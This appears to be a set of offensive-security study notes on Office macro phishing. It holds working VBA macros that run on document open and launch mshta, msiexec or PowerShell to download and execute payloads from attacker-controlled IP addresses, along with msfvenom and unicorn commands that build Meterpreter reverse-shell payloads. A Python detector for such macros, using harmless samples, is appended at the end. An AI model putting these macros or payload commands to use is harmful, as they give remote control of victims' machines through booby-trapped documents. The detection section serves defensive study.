[Online - Reverse Shell Generator](https://www.revshells.com/)
[Online text string splitting tool - UU Online Tools](https://uutool.cn/txt-slice/)
[https://gist.github.com/tothi/ab288fb523a4b32b51a53e542d40fe58](https://gist.github.com/tothi/ab288fb523a4b32b51a53e542d40fe58)
[https://ivanitlearning.wordpress.com/2020/08/06/rce-on-windows-x86-vs-x64-powershell-payloads/](https://ivanitlearning.wordpress.com/2020/08/06/rce-on-windows-x86-vs-x64-powershell-payloads/)
[Powershell scripts used to run malicious shellcode. Reverse shell vs Bind shell – CYBER GEEKS](https://cybergeeks.tech/powershell-scripts-used-to-run-malicious-shellcode-reverse-shell-vs-bind-shell/)
[Reverse Shell Generator](https://weibell.github.io/reverse-shell-generator/)

### odt-shell

https://www.hackplayers.com/2018/06/shell-mediante-un-documento-odt.html

### xlsx

```evil hta
Sub HelloWorld()
    PID = Shell("mshta.exe http://10.50.1.180:8080/4dmhetOBBmjt.hta")
End Sub

Sub Auto_Open()
    HelloWorld
End Sub

' This never worked?? Switched to another approach, so this one is no longer used.
' The main reason is that a module has to be created.
```

```
Sub AutoOpen()
    MyMacro
End Sub

Sub Document_Open()
    MyMacro
End Sub

Sub MyMacro()
    Dim Str As String
    ' Str holds a "powershell.exe -e <base64>" command line, assembled from
    ' a long run of Str = Str + "..." fragments.
    CreateObject("Wscript.Shell").Run Str
End Sub
```

[https://www.redteam101.tech/offensive-security/initial-access/phishing-with-ms-office/phishing-xlm-macro-4.0](https://www.redteam101.tech/offensive-security/initial-access/phishing-with-ms-office/phishing-xlm-macro-4.0)

###

```
python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.109 1234 hta
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f hta-psh > shell.hta
```

### DOC

```
32-bit??
```

```
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.119.160 lport=80 -f msi > 1.msi

Sub AutoOpen()
    MyMacro
End Sub

Sub Document_Open()
    MyMacro
End Sub

Sub MyMacro()
    PID = Shell("msiexec /q /i http://192.168.119.160/1.msi")
End Sub

Sub Auto_Open()
    MyMacro
End Sub
```

```
Sub HelloWorld()
    PID = Shell("mshta.exe http://192.168.119.250/4dmhetOBBmjt.hta")
End Sub

Sub Auto_Open()
    HelloWorld
End Sub
```

![[Pasted image 20220414004855.png]]

### osep ways

```vb
Dim str As String
str = "powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.119.120/msfstaged.exe','msfstaged.exe')"
Shell str, vbHide

Sub Document_Open()
    MyMacro
End Sub

Sub AutoOpen()
    MyMacro
End Sub

Sub MyMacro()
    Dim str As String
    str = "powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.119.120/msfstaged.exe', 'msfstaged.exe')"
    Shell str, vbHide
    Dim exePath As String
    exePath = ActiveDocument.Path + "\msfstaged.exe"
    Wait (2)
    Shell exePath, vbHide
End Sub

Sub Wait(n As Long)
    Dim t As Date
    t = Now
    Do
        DoEvents
    Loop Until Now >= DateAdd("s", n, t)
End Sub
```

### Location

```
macor_shell
```
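
The macros in these notes share a few static traits: an auto-run entry point, a process-launch call, and a Windows binary that is handed a URL or an encoded command. As an added example (not part of the original notes), the Python below flags those traits in macro source text that has already been extracted from a document, for instance with oletools' `olevba`; the function name, the sample macros and the host address are constructed for illustration.

```python
import re

# Entry points Office runs automatically when a document or workbook opens.
AUTO_EXEC = re.compile(r"^\s*(?:Private\s+|Public\s+)?Sub\s+"
                       r"(AutoOpen|Auto_Open|Document_Open|Workbook_Open)\b", re.I | re.M)
# VBA calls that start a process: Shell(...) or Wscript.Shell's .Run.
LAUNCH = re.compile(r"\bShell\b|\.Run\b", re.I)
# Windows binaries the macros in these notes pass a URL or command to.
LOLBIN = re.compile(r"\b(mshta|msiexec|powershell)(?:\.exe)?\b", re.I)
URL = re.compile(r"https?://[^\s\"')]+", re.I)
# "powershell -e <base64>", matched after split string literals are rejoined.
ENCODED = re.compile(r"powershell(?:\.exe)?\s+-e\w*\s+[A-Za-z0-9+/=]{16,}", re.I)
STRING_LITERAL = re.compile(r'"((?:[^"]|"")*)"')

def triage(vba: str) -> dict:
    # Macros often build a command with Str = Str + "..."; rejoin the pieces.
    joined = "".join(STRING_LITERAL.findall(vba))
    found = {
        "auto_exec": sorted({m.lower() for m in AUTO_EXEC.findall(vba)}),
        "launch": bool(LAUNCH.search(vba)),
        "lolbins": sorted({m.lower() for m in LOLBIN.findall(vba)}),
        "urls": URL.findall(vba),
        "encoded_ps": bool(ENCODED.search(joined)),
    }
    # Flag only when auto-run and a process launch meet a LOLBin or remote URL.
    found["suspicious"] = bool(found["auto_exec"] and found["launch"]
                               and (found["lolbins"] or found["urls"]))
    return found

# Constructed samples; 198.51.100.10 is a documentation address (RFC 5737).
SAMPLE_HTA = '''
Sub Fetch()
    PID = Shell("mshta.exe http://198.51.100.10/sample.hta")
End Sub
Sub Auto_Open()
    Fetch
End Sub
'''
# The encoded text is base64 of "ABCDEFGHIJKLMNOP", not a real command.
SAMPLE_ENCODED = '''
Sub AutoOpen()
    s = "powershell.exe -e QUJD"
    s = s + "REVGR0hJSktMTU5PUA=="
    CreateObject("Wscript.Shell").Run s
End Sub
'''
SAMPLE_BENIGN = 'Sub Workbook_Open()\n    MsgBox "Welcome"\nEnd Sub\n'

if __name__ == "__main__":
    print(triage(SAMPLE_HTA), triage(SAMPLE_ENCODED), triage(SAMPLE_BENIGN), sep="\n")
```

Rejoining the string literals matters for the second sample: the encoded command is too short to match in any single fragment and only becomes visible once the pieces are concatenated.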